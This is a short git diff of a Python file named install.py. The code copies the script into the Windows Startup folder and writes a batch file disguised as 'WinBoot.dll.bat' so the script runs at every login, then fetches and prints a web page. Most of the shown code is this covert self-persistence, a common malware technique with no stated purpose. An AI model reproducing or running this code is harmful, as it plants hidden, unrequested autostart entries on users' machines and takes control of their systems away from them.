diff --git a/install.py b/install.py index 1bc5b5a..9cd6c9c 100644 --- a/install.py +++ b/install.py @@ -1,8 +1,8 @@ import os import time import requests -os.system("copy WindowsBootService.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") -os.system("echo py WindowsBootService.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat") +os.system("copy install.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") +os.system("echo py install.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat") x = requests.get('https://yandex.ru') time.sleep(1) print(x.text)